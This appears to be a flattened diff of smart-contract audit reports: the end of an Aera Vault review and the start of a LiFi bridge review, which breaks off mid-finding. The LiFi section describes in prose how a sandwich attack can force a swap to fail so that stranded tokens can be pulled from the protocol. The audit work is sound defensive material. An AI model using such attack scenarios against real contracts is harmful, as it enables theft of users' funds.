Description: The function returnFunds() calls getHoldings() and getTokens(). Both functions call getTokens- Data() thus waste gas unnecessarily. function returnFunds() internal returns (uint256[] memory amounts) { uint256[] memory holdings = getHoldings(); IERC20[] memory tokens = getTokens(); ... } function getHoldings() public view override returns (uint256[] memory amounts) { (, amounts, ) = getTokensData(); } function getTokens() public view override returns (IERC20[] memory tokens) { (tokens, , ) = getTokensData(); } Recommendation: Call getTokensData() directly from returnFunds(). Gauntlet: Solved in PR #100. Spearbit: Acknowledged. +5.5.3 Change uint32 and uint64 to uint256 Severity: Gas Optimization Context: AeraVaultV1.sol#L63-L88, AeraVaultV1.sol#L769-L774 Description: The contract contains a few variables/constants that are smaller than uint256: noticePeriod, no- ticeTimeoutAt and lastFeeCheckpoint. This doesn’t actually save gas because they are not part of a struct and still take up a storage slot. It even costs more gas because additional bits have to be stripped off. Additionally, there is a very small risk of lastFeeCheckpoint wrapping to 0 in the updateManagerFeeIndex() function. If that would happen, managerFeeIndex would get far too large and too many fees would be paid out. Finally, using int256 simplifies the code. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { ... uint32 public immutable noticePeriod; ... uint64 public noticeTimeoutAt; ... uint64 public lastFeeCheckpoint = type(uint64).max; ... } function updateManagerFeeIndex() internal { managerFeeIndex += (block.timestamp - lastFeeCheckpoint) * managementFee; // could get large when lastFeeCheckpoint wraps lastFeeCheckpoint = block.timestamp.toUint64(); } Recommendation: • Replace uint32 and uint64 with uint256. 26 • Remove the conversion functions toUint64(). • Remove import "./dependencies/openzeppelin/SafeCast.sol"; • Remove using SafeCast for uint256; +5.5.4 Use block.timestamp directly instead of assigning it to a temporary variable. Severity: Gas Optimization Context: AeraVaultV1.sol#L883, AeraVaultV1.sol#L580 Description: It is preferable to use block.timestamp directly in your code instead of assigning it to a temporary variable as it only uses 2 gas. Recommendation: Use block.timestamp directly. Example: - - + uint256 timestamp = block.timestamp; pool.updateWeightsGradually(timestamp, timestamp, weights); pool.updateWeightsGradually(block.timestamp, block.timestamp, weights); Gauntlet: Solved in PR #102. Spearbit: Acknowledged. +5.5.5 Consider replacing pool.getPoolId() with bytes32 public immutable poolId to save gas and ex- ternal calls Severity: Gas Optimization Context: AeraVaultV1.sol#L394, AeraVaultV1.sol#L723-L725, AeraVaultV1.sol#L738, AeraVaultV1.sol#L855 Description: The current implementation of Aera Vault always calls pool.getPoolId() or indirectly getPoolId() to retrieve the ID of the immutable state variable pool that has been declared at constructor time. The pool.getPoolId() is a getter function defined in the Balancer BasePool contract: function getPoolId() public view override returns (bytes32) { return _poolId; } Inside the same BasePool contract the _poolId is defined as immutable which means that after creating a pool it will never change. For this reason it is possible to apply the same logic inside the Aera Vault and use an immutable variable to avoiding external calls and save gas. Recommendation: Consider the following suggestions: • Initializing an immutable variable with the poolId value after deploying the Balancer pool. • Deleting all the reference to getPoolId() and pool.getPoolId(). • Replacing those reference with a direct read to the immutable poolId. 27 bytes32 private immutable poolId; + constructor( ... ) { ... pool = IBManagedPool( IBManagedPoolFactory(factory).create( IBManagedPoolFactory.NewPoolParams({ ... }) ) ); poolId = pool.getPoolId(); ... + } Gauntlet: Fix has been implemented in PR #123. Spearbit: Acknowledged. +5.5.6 Save values in temporary variables Severity: Gas Optimization Context: AeraVaultV1.sol#L495, AeraVaultV1.sol#L808. AeraVaultV1.sol#L816, AeraVaultV1.sol#L858, AeraVaultV1.sol#L876 AeraVaultV1.sol#L427, AeraVaultV1.sol#L382, AeraVaultV1.sol#L481, AeraVaultV1.sol#L620, AeraVaultV1.sol#L652, AeraVaultV1.sol#L906, AeraVaultV1.sol#L301, Description: We observed multiple occurrences in the codebase where .length was used in for loops. This could lead to more gas consumption as .length gets called repetitively until the for loop finishes. When indexed variables are used multiple times inside the loop in a read only way these can be stored in a temporary variable to save some gas. for (uint256 i = 0; i < tokens.length; i++) { // tokens.length has to be calculated repeatedly ... ... = tokens[i].balanceOf(...); tokens[i].safeTransfer(owner(), ...); } // tokens[i] has to be evaluated multiple times Recommendation: The value of .length could be saved in a temporary variable for saving some gas cost. Also [i] could be saved in a temporary variable for saving some gas cost, provided it is used in a read only way. Example: uint256 length = tokens.length; //temporary variable for (uint256 i = 0; i < length; i++) { ... IERC20 tmpToken = tokens[i]; ... = tmpToken.balanceOf(...); tmpToken.safeTransfer(owner(), ...); //temporary variable } Gauntlet: Solved in PR #100. Spearbit: Acknowledged. 28 5.6 Informational +5.6.1 Aera could be prone to out-of-gas transaction revert when managing a high number of tokens Severity: Informational Context: AeraVaultV1.sol#L531-L541 AeraVaultV1.sol#L350-L399, AeraVaultV1.sol#L402-L453, AeraVaultV1.sol#L456-L514, Description: The Balancer ManagedPool used by Aera has a max limit of 50 token. Functions like: initialDeposit(), deposit(), withdraw() and finalize() involve numerous external direct and indirect (made by Balancer itself when called by Aera) calls and math calculations that are done for each token managed by the pool. The functions deposit() and withdraw() are especially gas intensive, given that they also internally call calcu- lateAndDistributeManagerFees() that will transfer, for each token, a management fee to the manager. For these reasons Aera should be aware that a high number of tokens managed by the Aera Vault could lead to out-of-gas reverts (max block size depends on which chain the project will be deployed). Recommendation: Consider the following suggestions: • Monitor and tests gas consumption from those functions, simulating a managed pool that handles the max number of tokens allowed by the Balancer’s ManagedPool. • Consider adding a custom max limit on the number of tokens supported by the AeraPool. • Consider applying the suggestions reported in issue "Malicious manager could result in inaccessible funds of the Vault". • Consider the max block size currently available for the chains on which the project will be deployed. Gauntlet: We are starting with 2 tokens for V1 and only gradually increasing. We will be incorporating the sug- gestions in Malicious manager could result in inaccessible funds of the Vault. +5.6.2 Use a consistent way to call getNormalizedWeights() Severity: Informational Context: AeraVaultV1.sol Description: The functions deposit() and withdraw() call function getNormalizedWeights() while the function updateWeightsGradually() and cancelWeightUpdates() call pool.getNormalizedWeights(). Although this is functionally the same, it is not consistent. 29 function deposit(uint256[] calldata amounts) ... { ... uint256[] memory weights = getNormalizedWeights(); ... emit Deposit(amounts, getNormalizedWeights()); } function withdraw(uint256[] calldata amounts) ... { ... uint256[] memory weights = getNormalizedWeights(); ... emit Withdraw(amounts, allowances, getNormalizedWeights()); } function updateWeightsGradually(...) ... { ... uint256[] memory weights = pool.getNormalizedWeights(); ... } function cancelWeightUpdates() ... { ... uint256[] memory weights = pool.getNormalizedWeights(); ... } function getNormalizedWeights() ... { return pool.getNormalizedWeights(); } Recommendation: Consistently using either getNormalizedWeights() or pool.getNormalizedWeights(). Gauntlet: Fixed in PR #137. Spearbit: Acknowledged. +5.6.3 Add function disableTrading() to IManagerAPI.sol Severity: Informational Context: AeraVaultV1.sol#L347-L596, IManagerAPI.sol Description: The disableTrading() function can also be called by managers because of the onlyOwnerOrMan- agermodifier. However in AeraVaultV1.sol it is located in the PROTOCOL API section. It is also not present in IManagerAPI.sol. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { /// PROTOCOL API /// function disableTrading() ... onlyOwnerOrManager ... { ... } /// MANAGER API /// } interface IManagerAPI { function updateWeightsGradually(...) external; function cancelWeightUpdates() external; function setSwapFee(uint256 newSwapFee) external; function claimManagerFees() external; } // disableTrading() isn't present 30 Recommendation: Update the comments in AeraVaultV1.sol. Add disableTrading() to IManagerAPI.sol. +5.6.4 Doublecheck layout functions Severity: Informational Context: AeraVaultV1.sol Description: Different ways are used to layout functions. Especially the part between ( ... ) and between ) ... { is sometimes done on one line and sometimes split in multiple lines. Also { is sometimes at the end of a line and sometimes at the beginning. Although the layout is not disturbing it might be useful to doublecheck it. Here are a few examples of different layouts: function updateWeights(uint256[] memory weights, uint256 weightSum) internal ... { } function depositToken(IERC20 token, uint256 amount) internal { ... } function updatePoolBalance( uint256[] memory amounts, IBVault.PoolBalanceOpKind kind ) internal { ... } function updateWeights(uint256[] memory weights, uint256 weightSum) internal ... { } function updateWeightsGradually( uint256[] calldata targetWeights, uint256 startTime, uint256 endTime ) external override onlyManager whenInitialized whenNotFinalizing { ... } function getWeightChangeRatio(uint256 weight, uint256 targetWeight) internal pure returns (uint256) { } ... Recommendation: Double check the layout rules for functions. Gauntlet: We use Prettier for code formatting and this issue is related to the tool itself. I believe the formatting here is consistent as lines get broken up when they get too long rather than arbitrarily. Spearbit: Acknowledged. 31 +5.6.5 Use Math library functions in a consistent way Severity: Informational Context: AeraVaultV1.sol#L24, AeraVaultV1.sol#L486, AeraVaultV1.sol#L605 Description: In the AeraVaultV1 contract, the OZ’s Math library functions are attached to the type uint256. The min function is used as a member function whereas the max function is used as a library function. Recommendation: To maintain consistency use Math.min at L486 or change L605 into the a.max(b) format. Note: using Math for uint256; can be removed if the Math... pattern is used. Gauntlet: Fixed in PR #111 and PR #139. Spearbit: Acknowledged. +5.6.6 Separation of concerns Owner and Manager Severity: Informational Context: AeraVaultV1.sol#L545-L556 Description: The Owner and Manager roles are separated on purpose. Role separation usually helps to improve quality. However this separation can be broken if the Owner calls setManager(). This way the Owner can set the Manager to one of his own addresses, do Manager functions (for example setSwapFee()) and perhaps set it back to the Manager. Note: as everything happens on chain these actions can be tracked. function setManager(address newManager) external override onlyOwner { if (newManager == address(0)) { revert Aera__ManagerIsZeroAddress(); } if (initialized && noticeTimeoutAt == 0) { calculateAndDistributeManagerFees(); } emit ManagerChanged(manager, newManager); manager = newManager; } Recommendation: Depending on the usefulness of separation of concerns consider doing the following: • Add require(newManager != owner()) to the setManager() function to prevent accidentally setting the Owner as the Manager. Note: as discussed this doesn’t protect against deliberately creating a separate address by the Owner and using that. • Have a third role to set the Manager, possibly managed by a multisig. Gauntlet: We think it’s important for the treasury to be able to direct and immediate control over the manager, so we are not able to remove that power for V1. In future versions, this trust model may change. 32 +5.6.7 Add modifier whenInitialized to function finalize() Severity: Informational Context: AeraVaultV1.sol#L531-L541 Description: The function finalize() does not have the modifier whenInitialized while most other functions have this modifier. This does not create any real issues because the function contains the check noticeTimeoutAt == 0 which can only be skipped after initiateFinalization(), and this function does have the whenInitialized modifier. function finalize() external override nonReentrant onlyOwner { // no modifier whenInitialized if (noticeTimeoutAt == 0) { // can only be set via initiateFinalization() revert Aera__FinalizationNotInitialized(); } ... } Recommendation: Add the whenInitialized modifier to function finalize(). Gauntlet: Fixed in PR #111. Spearbit: Acknowledged. +5.6.8 Document the use of mustAllowlistLPs Severity: Informational Context: AeraVaultV1.sol#L305-L323 Description: In the Mannon Vault it is important that no other accounts can use joinPool() on the balancer pool. If other accounts are able to call joinPool(), they would get Balancer Pool Tokens (BPT) which could rise in value once more funds are added to the pool. Luckily this is prevented by the mustAllowlistLPs parameter in NewPoolParams. Readers could easily overlook this parameter. pool = IBManagedPool( IBManagedPoolFactory(factory).create( IBManagedPoolFactory.NewPoolParams({ vault: IBVault(address(0)), name: name, symbol: symbol, tokens: tokens, normalizedWeights: weights, assetManagers: managers, swapFeePercentage: swapFeePercentage, pauseWindowDuration: 0, bufferPeriodDuration: 0, owner: address(this), swapEnabledOnStart: false, mustAllowlistLPs: true, managementSwapFeePercentage: 0 // prevent other account to use joinPool }) ) ); Recommendation: Add a comment showing the significance of the mustAllowlistLPs parameter. 33 +5.6.9 finalize can be called multiple times Severity: Informational Context: AeraVaultV1.sol#L531-L541 Description: The finalize function can be called multiple time, leading to the possibility to waste gas for no reason and emitting again a conceptually wrong Finalized event. Currently, there’s no check that will prevent to call the function multiple time and there is no explicit flag to allow external sources (web app, external contract) to know whether the AeraVault has been finalized or not. Scenario: the AeraVault has already been finalized but the owner (that could be a contract and not a single EOA) is not aware of it. He calls finalize again and wastes gas because of the external calls in a loop done in returnFunds and emit an additional event Finalized(owner(), [0, 0, ..., 0]) with an array of zeros in the amounts event parameter. Recommendation: One simple change that could make the UX/DX much better would be to have a state variable to track if the finalize function have been called already. /// STORAGE SLOT START /// +/// @notice Indicates that the Vault has been finalized +bool public finalized; function finalize() external override nonReentrant onlyOwner { if (noticeTimeoutAt == 0) { revert Aera__FinalizationNotInitialized(); } if (noticeTimeoutAt > block.timestamp) { revert Aera__NoticeTimeoutNotElapsed(noticeTimeoutAt); } finalized = true; uint256[] memory amounts = returnFunds(); emit Finalized(owner(), amounts); + } With the new finalized boolean, there are two possible solutions to the problem: • Soft approach: the finalized == true in addition with the fact that all the token balances in the Balancer pool are empty (equal to 0) is a consequence that the AeraVault have been already finalized and funds have been withdrawn. This combined information can be used to let an external website/contract know that there is no reason to call finalize again. • Hard approach: add a if (finalized) revert Aera__AlreadyFinalized(); check after the present checks to revert in the case that the finalize function have been already called previously. Something important to keep in mind is that this would prevent the owner of the Vault to be able to withdraw funds in the case where something on the Balancer side have gone wrong (without reverting the transaction) and not all the remaining funds have been sent to the AeraVault. Gauntlet: Let’s go for the hard option. Implemented in PR #137. Spearbit: Acknowledged. The "hard approach" has been implemented. 34 +5.6.10 Consider updating finalize to have a more "clean" final state for the AeraVault/Balancer pool Severity: Informational Context: AeraVaultV1.sol#L531-L541 Description: This is just a suggestion and not an issue per se. The finalize function should ensure that the pool is in a finalized state for both a better UX and DX. Currently, the finalize function is only withdrawing all the funds from the pool after a noticePeriod but is not ensuring that the swap have been disabled and that all the rewards, entitled to the Vault (owned by the Treasury), have been claimed. Recommendation: Consider implementing the following actions to have, as a result, a more clean vault/pool clean state after executing finalize: • claim remaining vault rewards and sweep them • disable swap if not already disabled • Consider speaking with Balancer to understand which is the best practice to follow when a pool is being "retired". For example, should the LP token minted during the pool initial deposit be burned even if the Trea- sury/Vault will not be able to withdraw them because of issue "Sweep function should prevent the Treasury to withdraw pool’s BPT"? +5.6.11 enableTradingWithWeights is not emitting an event for pool’s weight change Severity: Informational Context: AeraVaultV1.sol#L574-L583 Description: enableTradingWithWeights is both changing the pool’s weight and enabling the swap feature, but it’s only emitting the swap related event (done by calling setSwapEnabled). Both of those operations should be correctly tracked via events to be monitored by external tools. Recommendation: The best thing to do is to create a new event that would also allow specifically to track this delicate operation that is done by the Treasury, that usually would not have the ability to update the pool’s weight. +/// @notice Emitted when enableTradingWithWeights is called. +/// @param time timestamp of updates. +/// @param weights Target weights of tokens. +event EnabledTradingWithWeights( + + +); uint256 time, uint256[] weights function enableTradingWithWeights(uint256[] calldata weights) external override onlyOwner whenInitialized { - + + } uint256 timestamp = block.timestamp; pool.updateWeightsGradually(timestamp, timestamp, weights); setSwapEnabled(true); pool.setSwapEnabled(true); emit EnabledTradingWithWeights(timestamp, weights); Gauntlet: Fixed in PR #126. Spearbit: Acknowledged. 35 +5.6.12 Document Balancer checks Severity: Informational Context: AeraVaultV1.sol#L574-L583, ManagedPool.sol#L375-L387 Description: Balancer has a large number of internal checks. We’ve discussed the use of additional checks in the Aera Vault functions. The advantage of this is that it could result in more user friendly error messages. Additionally it protects against potential future change in the Balancer code. contract AeraVaultV1 is IAeraVaultV1, Ownable, ReentrancyGuard { function enableTradingWithWeights(uint256[] calldata weights) ... { { ... // doesn't check weights.length pool.updateWeightsGradually(timestamp, timestamp, weights); ... } } Balancer code: function updateWeightsGradually( ..., uint256[] memory endWeights) ... { (IERC20[] memory tokens, , ) = getVault().getPoolTokens(getPoolId()); ... InputHelpers.ensureInputLengthMatch(tokens.length, endWeights.length); // length check is here ... } Recommendation: Consider documenting where the code relies on checks in balancer. This makes reasoning about the correctness of the Aera Vault easier, for Aera developers, auditors and users of the code. Gauntlet: We reasoned that since Balancer has named errors it should be clear enough when those invariants are broken. This is a treasury product which people will interact with mainly through the UI. +5.6.13 Rename FinalizationInitialized to FinalizationInitiated for code consistency Severity: Informational Context: AeraVaultV1.sol#L165, AeraVaultV1.sol#L207, AeraVaultV1.sol#L517 Description: The function at L517 was renamed from initializeFinalization to initiateFinalization to avoid confusion with the Aera vault initialization. For code consistency, the corresponding event and error names should be changed. Recommendation: Rename the event at L165 to FinalizationInitiated, and the error at L207 to Aera__- FinalizationNotInitiated. Gauntlet: Fixed in PR #111. Spearbit: Acknowledged. 36 +5.6.14 Consider enforcing an explicit check on token order to avoid human error Severity: Informational Context: • AeraVaultV1.sol#L350 • AeraVaultV1.sol#L402 • AeraVaultV1.sol#L456 • AeraVaultV1.sol#L574 • AeraVaultV1.sol#L599-L603 Description: The Balancer protocol require (and enforce during the pool creation) that the pool’s token must be ordered by the token address. The following functions accept an uint256[] of amounts or weights without knowing if the order inside that array follow the same order of the tokens inside the Balancer pool. • initialDeposit • deposit • withdraw • enableTradingWithWeights • updateWeightsGradually While it’s impossible to totally prevent the human error (they could specify the correct token order but wrongly swap the input order of the amount/weight) we could force the user to be more aware of the specific order in which the amounts/weights must be specified. A possible solution applied to the initialDeposit as an example could be: 37 function initialDeposit(IERC20[] calldata tokensSorted, uint256[] calldata amounts) external override onlyOwner { // ... other code IERC20[] memory tokens = getTokens(); // check that also the tokensSorted length match the lenght of other arrays if (tokens.length != amounts.length || tokens.length != tokensSorted.length) { revert Aera__AmountLengthIsNotSame( tokens.length, amounts.length ); } // ... other code for (uint256 i = 0; i < tokens.length; i++) { // check that the token position associated to the amount has the same position of the one in ,! the balancer pool if( address(tokens[i]) != address(tokensSorted[i]) ) { revert Aera__TokenOrderIsNotSame( address(tokens[i]), address(tokensSorted[i]), i ); } depositToken(tokens[i], amounts[i]); } // ... other code } Another possible implementation would be to introduce a custom struct struct TokenAmount { IERC20 token; uint256 value; } Update the function signature function initialDeposit(TokenAmount[] calldata tokenWithAmount) and up- date the example code following the new parameter model. It’s important to note that while this solution will not completely prevent the human error, it will increase the gas consumption of each function. Recommendation: Evaluate the possibility to reduce hypothetical human errors, enforcing a more explicit check on token amounts/weights order when updating the pool at the cost of increasing the gas consumption. Gauntlet: Spearbit: 38 +5.6.15 Swap is not enabled after initialDeposit execution Severity: Informational Context: AeraVaultV1.sol#L350-L399 Description: In the current deployment flow of the AeraVault the Balancer pool is created (by the constructor) with swapEnabledOnStart set as false. When the pool receives their initial funds via initialDeposit the pool has still the swap functionality disabled. It is not explicitly clear in the specification document and in the code when the swap functionality should be enabled. If the protocol wants to enable the swap as soon as the funds are deposited in the pool, they should call, after bVault.joinPool(...), setSwapEnabled(true) or enableTradingWithWeights(uint256[] calldata weights) in case the external spot price is not aligned (both functions will also trigger a SetSwapEnabled event) Recommendation: Ensure to call setSwapEnabled(true) or enableTradingWithWeights(uint256[] calldata weights) at the end of initialDeposit if you intend to enable swapping after the pool has been funded. Gauntlet: Suggestion has been implemented in PR #123. Spearbit: Acknowledged. This behavior change should also be documented in both high-level documentation and natspec. +5.6.16 Remove commented code and replace input values with Balancer enum Severity: Informational Context: AeraVaultV1.sol#L371-L380 Description: Inside initialDeposit function, there is some commented code (used as example) that should be removed for clarity and future confusion. The initUserData should not use direct input values (0 in this case) but use the correct Balancer’s enum value to avoid any possible confusion. Following the Balancer documentation • Encoding userData • JoinKind The correct way to declare initUserData is using the WeightedPoolUserData.JoinKind.INIT enum value. Recommendation: • Remove the code example comments • Update the code to user Balancer’s enum value Gauntlet: Fixed in PR #102. Spearbit: Acknowledged. +5.6.17 The Created event is not including all the information used to deploy the Balancer pool and are missing indexed properties Severity: Informational Context: AeraVaultV1.sol#L95-L111, AeraVaultV1.sol#L334-L342 Description: The current Created event is defined as 39 event Created( address indexed factory, IERC20[] tokens, uint256[] weights, address manager, address validator, uint32 noticePeriod, string description ); And is missing some of the information that are used to deploy the pool. To allow external tools to better monitor the deployment of the pools, it should be better to include all the information that have been used to deploy the pool on Balancer. The following information is currently missing from the event definition: • name • symbol • managementFee • swapFeePercentage The event could also define both manager and validator as indexed event parameters to allow external tools to filter those events by those values. Recommendation: We recommend to: • Change manager and validatoras indexed event parameter • Add the missing information to the event event Created( address indexed factory, string name, string symbol, IERC20[] tokens, uint256[] weights, uint256 swapFeePercentage, address manager, address validator, address indexed manager, address indexed validator, uint32 noticePeriod, uint256 managementFee, string description + + + - - + + + ); • Update the event natspec comment to include documentation for the added event parameters • Update the emit Created event code to include the missing informations 40 emit Created( factory, name, symbol, tokens, weights, swapFeePercentage, manager_, validator_, noticePeriod_, managementFee_ description_ + + + + ); Gauntlet: Fixed in PR #101. Spearbit: Acknowledged. +5.6.18 Rename temp variable managers to assetManagers to avoid confusions and any potential future mistakes Severity: Informational Context: AeraVaultV1.sol#L300 Description: The managers declared in the linked code (see context) are in reality Asset Manager that have a totally different role compared to the AeraVault Manager role. The AssetManager is able to control the pool’s balance, withdrawing from it or depositing into it. To avoid confusion and any potential future mistakes, it should be better to rename the temporary variable managers to a more appropriate name like assetManagers. - address[] memory managers = new address[](tokens.length); + address[] memory assetManagers = new address[](tokens.length); for (uint256 i = 0; i < tokens.length; i++) { - + } managers[i] = address(this); assetManagers[i] = address(this); pool = IBManagedPool( IBManagedPoolFactory(factory).create( - + IBManagedPoolFactory.NewPoolParams({ vault: IBVault(address(0)), name: name, symbol: symbol, tokens: tokens, normalizedWeights: weights, assetManagers: managers, assetManagers: assetManagers, swapFeePercentage: swapFeePercentage, pauseWindowDuration: 0, bufferPeriodDuration: 0, owner: address(this), swapEnabledOnStart: false, mustAllowlistLPs: true, managementSwapFeePercentage: 0 }) ) ); 41 Recommendation: Rename managers to assetManagers to avoid confusion and any potential future mistakes. Gauntlet: Fixed in PR #123. Spearbit: Acknowledged. +5.6.19 Move description declaration inside the storage slot code block Severity: Informational Context: AeraVaultV1.sol#L72-L74 Description: In the current code, the description state variable is in the block of /// STORAGE /// where all the immutable variable are re-grouped. As the dev comment say, string cannot be immutable bytecode but only set in constructor so it would be better to move it inside the /// STORAGE SLOT START /// block of variables that regroup all the non-constant and non-immutable state variables. Recommendation: Move the description state variable inside the /// STORAGE SLOT START /// code part Gauntlet: Fixed in PR #112. Spearbit: Acknowledged. +5.6.20 Remove unused imports from code Severity: Informational Context: AeraVaultV1.sol#L6 Description: The current implementation of the AeraVaultV1 contract is importing OpenZeppelin IERC165 inter- face, but that interface is never used or references in the code. Recommendation: Remove the import -import "./dependencies/openzeppelin/IERC165.sol"; Gauntlet: Fixed in PR #102. Spearbit: Acknowledged. +5.6.21 shortfall is repeated twice in IWithdrawalValidator natspec comments Severity: Informational Context: IWithdrawalValidator.sol#L7-L8 Description: The word shortfall is repeated twice in the natspec comment. Recommendation: Remove one instance of the word following the used style guide (row max length) Gauntlet: Fixed in PR #101. Spearbit: Acknowledged. 42 +5.6.22 Provide definition of weights & managementFee_ in the NatSpec comment Severity: Informational Context: AeraVaultV1.sol#L251-L259 Description: The NatSpec Format is special form of comments to provide rich documentation for functions, return variables and more. We observed an occurrence where the NatSpec comments are missing for two of the user inputs (weights & managementFee_). Recommendation: Provide proper definition of weights & managementFee_ in the NatSpec format comment i.e. @param Gauntlet: Fixed in PR #101. Spearbit: Acknowledged. 43 diff --git a/findings_newupdate/spearbit/LIFI-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LIFI-Spearbit-Security-Review.txt new file mode 100644 index 0000000..50f0e54 --- /dev/null +++ b/findings_newupdate/spearbit/LIFI-Spearbit-Security-Review.txt @@ -0,0 +1,114 @@ +5.1.1 Hardcode bridge addresses via immutable Severity: High Risk Context: OmniBridgeFacet.sol#L34-L106, AxelarFacet.sol#L18-L23 Description: Most bridge facets call bridge contracts where the bridge address has been supplied as a parameter. This is inherently unsafe because any address could be called. Luckily, the called function signature is hardcoded, which reduces risk. However, it is still possible to call an unexpected function due to the potential collisions of function signatures. Users might be tricked into signing a transaction for the LiFi protocol that calls unexpected contracts. One exception is the AxelarFacet which sets the bridge addresses in initAxelar(), however this is relatively expensive as it requires an SLOAD to retrieve the bridge addresses. Note: also see "Facets approve arbitrary addresses for ERC20 tokens". function startBridgeTokensViaOmniBridge(..., BridgeData calldata _bridgeData) ... { ... _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false); } function _startBridge(..., BridgeData calldata _bridgeData, ...) ... { IOmniBridge bridge = IOmniBridge(_bridgeData.bridge); if (LibAsset.isNativeAsset(_bridgeData.assetId)) { bridge.wrapAndRelayTokens{ ... }(...); } else { ... bridge.relayTokens(...); } ... } contract AxelarFacet { function initAxelar(address _gateway, address _gasReceiver) external { ... s.gateway = IAxelarGateway(_gateway); s.gasReceiver = IAxelarGasService(_gasReceiver); } function executeCallViaAxelar(...) ... { ... s.gasReceiver.payNativeGasForContractCall{ ... }(...); s.gateway.callContract(destinationChain, destinationAddress, payload); } } Recommendation: Set bridge addresses in a constructor and store them as immutable variables. The gas costs are low and this approach also works with delegatecall and thus the Diamond pattern. Note: The Hop bridge protocol has a separate bridge contract for each token, so will require more complicated code, like a mapping from sendingAssetId to bridge address. See hopt.ts. Note: The Omni bride facet calls the functions relayTokens() and wrapAndRelayTokens() which are implemented in different contracts. So this requires some additional code, see: WETHOmnibridgeRouter.sol#L50, WETHOm- nibridgeRouter, bridge Note: this suggestion is also relevant for other addresses that are used, like the WETH address in AccrossFacet, see AcrossFacet.sol#L102 LiFi: Fixed with PR #105 and PR #79. 6 Spearbit: Verified. +5.1.2 Tokens are left in the protocol when the swap at the destination chain fails Severity: High Risk Context: Executor.sol#L125-L221, XChainExecFacet.sol#L17-L51 AmarokFacet.sol#L55-L94, StargateFacet.sol#L149-L187, NXTPFacet.sol#L86-L117, Description: LiFi protocol finds the best bridge route for users. In some cases, it helps users do a swap at the destination chain. With the help of the bridge protocols, LiFi protocol helps users trigger swapAndComplete- BridgeTokensVia{Services} or CompleteBridgeTokensVia{Services} at the destination chain to do the swap. Some bridge services will send the tokens directly to the receiver address when the execution fails. For example, Stargate, Amarok and NXTP do the external call in a try-catch clause and send the tokens directly to the receiver If the receiver is the Executor contract, when it fails. The tokens will stay in the LiFi protocol’s in this scenario. users can freely pull the tokens. Note: Exploiters can pull the tokens from LiFi protocol, Please refer to the issue Remaining tokens can be sweeped from the LiFi Diamond or the Executor , Issue #82 Exploiters can take a more aggressive strategy and force the victims swap to revert. A possible exploit scenario: • A victim wants to swap 10K optimism’s BTC into Ethereum mainnet USDC. • Since dexs on mainnet have the best liquidity, LiFi protocol helps users to the swap on mainnet • The transaction on the source chain (optimism) suceed and the Bridge services try to call Complete- BridgeTokensVia{Services} on mainnet. • The exploiter builds a sandwich attack to pump the BTC price. The CompleteBridgeTokens fails since the price is bad. • The bridge service does not revert the whole transaction. Instead, it sends the BTC on the mainnet to the receiver (LiFi protocol). • The exploiter pulls tokens from the LiFi protocol. Recommendation: * Since the remaining tokens are dangerous, we should try to avoid leaving tokens in the protocol address. In case the bridge services (e.g. Stargate, Connext) send tokens directly to the protocol in some edge cases, we should never set the protocol address as the receiver. • Similar to the AxelarFacet’s issue, the protocol should handle edge cases when the swap fails. Please refer to the issue Tokens transferred with Axelar can get lost if the destination transaction can’t be executed, issue #73. Recommend implementing a receiver contract. The receiver contract is responsible for handling callbacks. Since the bridge services may send the tokens directly to the receiver contract, we should avoid unsafe external calls. A possible receiver contract could be: contract ReceiverContract { ... function pullTokens(...) onlyOwner{ // @audit handles edge case ... } ... function sgReceive( uint16, // _srcChainId unused bytes memory, // _srcAddress unused uint256, // _nonce unused address token, // _token unused uint256 _amountLD, bytes memory _payload ) external { Storage storage s = getStorage(); 7 if (msg.sender != s.stargateRouter) { revert InvalidStargateRouter(); } //@audit: should use token address from the parameters instead of assetId from payload. (LiFiData memory lifiData, LibSwap.SwapData[] memory swapData, address receiver) = abi.decode( _payload, (LiFiData, LibSwap.SwapData[], address) ); //@audit: optional. // Could skip this if the contract always clears the allowance after the external call. ERC20(assetId).safeApprove(address(s.executor), 0); ERC20(assetId).safeIncreaseAllowance(address(s.executor), _amountLD); bool success; try s.executor.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, token, receiver) { success = true; } catch { ERC20(token).safeTransfer(receiver, _amountLD); success = false; } // always clear the allowance. ERC20(token).safeApprove(address(s.executor), 0); } } LiFi: Fixed with PR #73. Spearbit: Verified. +5.1.3 Tokens transferred with Axelar can get lost if the destination transaction can’t be executed Severity: High Risk Context: Executor.sol#L293-L316 Description: If _executeWithToken() reverts then the transaction can be retried, possibly with additional gas. See axelar recovery. However there is no option to return the tokens or send them elsewhere. This means that tokens would be lost if the call cannot be made to work. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeWithToken(...) ... { ... (bool success, ) = callTo.call(callData); if (!success) revert ExecutionFailed(); } } Recommendation: Consider sending the tokens to a recovery address in case the transaction fails. For comparison: The connext executor has logic to do this. LiFi: Fixed with PR #44 Spearbit: Verified. 8 +5.1.4 Use the getStorage() / NAMESPACE pattern instead of global variables Severity: High Risk Context: Swapper.sol#L17, SwapperV2.sol#L17, DexManagerFacet.sol#L21 Description: The facet DexManagerFacet and the inherited contracts Swapper.sol / SwapperV2.sol define a global variable appStorage on the first storage slot. These two overlap, which in this case is intentional. However it is dangerous to use this construction in a Diamond contract as this uses delegatecall. If any other contract uses a global variable it will overlap with appStorage with unpredictable results. This is especially impor- tant because it involves access control. For example if the contract IAxelarExecutable.sol were to be inherited in a facet, then its global variable gateway would overlap. Luckily this is currently not the case. contract DexManagerFacet { ... LibStorage internal appStorage; ... } contract Swapper is ILiFi { ... LibStorage internal appStorage; // overlaps with DexManagerFacet which is intentional ... } Recommendation: Use the getStorage() / NAMESPACE pattern for appStorage, as is done in other parts of the code. LiFi: We will refactor the underlying functionality into a Library that uses the getStorage() pattern. Refactored with PR #43. Spearbit: Verified. +5.1.5 Decrease allowance when it is already set a non-zero value Severity: High Risk Context: AxelarFacet.sol#L71, LibAsset.sol#L52, FusePoolZap.sol#L64, Executor.sol#L312 Description: Non-standard tokens like USDT will revert the transaction when a contract or a user tries to approve an allowance when the spender allowance is already set to a non zero value. For that reason, the previous allowance should be decreased before increasing allowance in the related function. • Performing a direct overwrite of the value in the allowances mapping is susceptible to front-running scenarios by an attacker (e.g., an approved spender). As an Openzeppelin mentioned, safeApprove should only be called when setting an initial allowance or when resetting it to zero. 9 function safeApprove( IERC20 token, address spender, uint256 value ) internal { // 